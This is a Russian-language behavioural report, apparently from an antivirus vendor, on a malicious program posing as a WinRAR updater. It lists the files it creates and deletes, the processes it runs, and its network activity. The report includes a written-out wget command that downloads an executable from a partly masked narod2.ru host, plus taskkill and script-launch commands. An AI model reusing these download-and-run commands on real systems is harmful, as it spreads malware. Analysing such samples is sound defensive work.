Техническая информация
Вредоносные функции:
Создает и запускает на исполнение:
- '%PROGRAM_FILES%\Company\Winrar\update1.exe'
- '%PROGRAM_FILES%\Company\Winrar\wget.exe' http://st######66666666.narod2.ru/update1.exe
- '%PROGRAM_FILES%\Company\Winrar\hex2bin.exe'
- '%PROGRAM_FILES%\Company\Winrar\update1.exe' (загружен из сети Интернет)
Запускает на исполнение:
- '<SYSTEM32>\ping.exe' ya.ru -n 5
- '<SYSTEM32>\taskkill.exe' /f /im winupd.exe
- '<SYSTEM32>\wscript.exe' "%PROGRAM_FILES%\Company\Winrar\stop.js"
- '<SYSTEM32>\cmd.exe' /c ""%PROGRAM_FILES%\Company\Winrar\winupd.bat" "
Изменения в файловой системе:
Создает следующие файлы:
- %PROGRAM_FILES%\Company\Winrar\wget.exe
- %PROGRAM_FILES%\Company\Winrar\winupd.bat
- %PROGRAM_FILES%\Company\Winrar\update1.exe
- %PROGRAM_FILES%\Company\Winrar\stop.js
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- %PROGRAM_FILES%\Company\Winrar\hex2bin.exe
Удаляет следующие файлы:
- %TEMP%\$inst\2.tmp
- %PROGRAM_FILES%\Company\Winrar\wget.exe
- %TEMP%\$inst\temp_0.tmp
- %PROGRAM_FILES%\Company\Winrar\stop.js
Сетевая активность:
Подключается к:
- 'st######66666666.narod2.ru':80
TCP:
Запросы HTTP GET:
- st######66666666.narod2.ru/update1.exe
UDP:
- DNS ASK st######66666666.narod2.ru
- DNS ASK ya.ru
Другое:
Ищет следующие окна:
- ClassName: '(null)' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
